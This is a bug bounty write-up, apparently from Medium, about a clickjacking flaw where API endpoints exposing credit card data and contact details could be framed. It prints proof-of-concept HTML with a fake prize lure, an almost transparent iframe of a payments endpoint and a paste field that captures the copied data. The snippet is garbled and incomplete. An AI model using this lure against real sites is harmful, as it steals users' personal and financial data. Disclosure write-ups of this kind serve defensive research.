$1800 worth Clickjacking

Osama Avvan
Jun 21, 2019 · 2 min read

In this writeup, I will talk about how I earned a total of $1800 by exploiting Clickjacking on pages where User sensitive information was disclosed, It was a private program on Bugcorwd.

So there were some API endpoints, which were disclosing User Information like Credit Card Data, Email, Name, Phone, Address, User Id, etc.





Now as there was no X-FRAME Header on any of these endpoints so I was able to load them in an IFRAME.

Now I had to create an HTML page to trick the user into stealing their Information. So I created an HTML page.

Image for post
Image for post


<!DOCTYPE html>

<div id=”parent”>

<center><h1 style=”color: blue; text-decoration: underline;”>Lucky Draw to Win $100</h1></center>

<h3>Click inside the box and Press CTRL+A then CTRL+C</h3>

<div style=”border: 2px solid gray;”>
<iframe src=”https://example.com/api/v1/wallet/payments?language=en" width=”100%” style=”opacity: 0.01"></iframe>


<h3>Click inside the box and press CTRL+V</h3>
<input type=”password” name=”” size=”1">
<! — <textarea rows=”1" cols=”1" style=”resize: none;”></textarea> →
<button id=”btn”>Click to Win</button>



document.querySelector(“#btn”).onclick = function() {
alert(“Congratulation! You have won $100”)


Now after performing all the steps when the user will click on the Button, his/her information will be logged in the console.

Image for post
Image for post

So that was it, Thank you for Reading.

Image for post
Image for post
Image for post
Image for post

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store